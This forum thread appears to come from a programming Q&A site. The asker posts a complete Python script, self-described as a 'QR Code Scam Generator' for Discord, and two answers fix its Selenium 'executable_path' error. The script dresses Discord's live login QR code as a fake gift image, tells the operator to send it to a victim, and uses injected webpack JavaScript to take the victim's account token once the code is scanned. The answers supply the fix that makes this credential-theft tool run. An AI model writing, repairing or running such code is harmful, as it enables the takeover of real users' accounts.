Python error: driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe') TypeError: WebDriver
Help fix errors in Python code!
I'm new to programming and don't know how to figure this out. I will be grateful to everyone who helps!
My Code
from bs4 import BeautifulSoup
from selenium import webdriver
from PIL import Image
import base64
import time
import os

# Developer: Parad1st
# Educational purposes only

def logo_qr():
    im1 = Image.open('temp/qr_code.png', 'r')
    im2 = Image.open('temp/overlay.png', 'r')
    im2_w, im2_h = im2.size
    im1.paste(im2, (60, 55))
    im1.save('temp/final_qr.png', quality=95)

def paste_template():
    im1 = Image.open('temp/template.png', 'r')
    im2 = Image.open('temp/final_qr.png', 'r')
    im1.paste(im2, (120, 409))
    im1.save('discord_gift.png', quality=95)

def main():
    print('https://github.com/Parad1st/Discord-Scam-QR')
    print('** QR Code Scam Generator by Parad1st **')

    options = webdriver.ChromeOptions()
    options.add_experimental_option('excludeSwitches', ['enable-logging'])
    options.add_experimental_option('detach', True)
    driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')

    driver.get('https://discord.com/login')
    time.sleep(5)
    print('- Page has been loaded.')

    page_source = driver.page_source

    soup = BeautifulSoup(page_source, features='lxml')

    div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
    qr_code = div.find('img')['src']
    file = os.path.join(os.getcwd(), 'temp/qr_code.png')

    img_data =  base64.b64decode(qr_code.replace('data:image/png;base64,', ''))

    with open(file,'wb') as handler:
        handler.write(img_data)

    discord_login = driver.current_url
    logo_qr()
    paste_template()

    print('- QR Code has been generated. > discord_gift.png ')
    print('Send the QR Code to user and scan. Waiting..')
    
    while True:
        if discord_login != driver.current_url:
            print('Grabbing token..')
            token = driver.execute_script('''

    var req = webpackJsonp.push([
        [], {
            extra_id: (e, t, r) => e.exports = r
        },
        [
            ["extra_id"]
        ]
    ]);
    for (let e in req.c)
        if (req.c.hasOwnProperty(e)) {
            let t = req.c[e].exports;
            if (t && t.__esModule && t.default)
                for (let e in t.default) "getToken" === e && (token = t.default.getToken())
        }
    return token;   
                ''')
            print('---')
            print('Token grabbed:',token)
            break

    print('Task complete. Успех!')

if __name__ == '__main__':
    main()



Error:
Traceback (most recent call last):
  File "C:\Users\Parad1st\Desktop\Discord-QR-Scam-main\qr_generator.py", line 87, in <module>
    main()
  File "C:\Users\Parad1st\Desktop\Discord-QR-Scam-main\qr_generator.py", line 33, in main
    driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
TypeError: WebDriver.__init__() got an unexpected keyword argument 'executable_path'

I tried installing an old version of selenium, it helped, but it does not support new versions of Chrome
I need the script to connect to Google Chrome and perform certain actions, but the code gives an error. If anything, I’m writing this so that the site will let me post a question because it writes that there is only one code in the text.
Thank you in advance!

from selenium import webdriver
from selenium.webdriver.chrome.service import Service

def main():

    options = webdriver.ChromeOptions()
    driver_path = r'chromedriver.exe'
    
    service = Service(driver_path)
    driver = webdriver.Chrome(service=service, options=options)

Try the above code which uses Service Class to set the executable path.

The answer by @Tula Ram Sahu is correct. In new selenium, you need to use Service Class to set the executable path.
Having said that, if you find difficulty in setting the driver executable path manually, you don't really have to worry about it. You can use Selenium Manager which is introduced from selenium v4.6.0 and above, which will take care of downloading and managing the browser drivers automatically for you.
In your main() function, just change the below code:
driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')

To:
driver = webdriver.Chrome(options=options)

Refer below answers to know more about Selenium Manager

https://stackoverflow.com/a/76463081/7598774
https://stackoverflow.com/a/76875896/7598774
https://stackoverflow.com/a/76564551/7598774

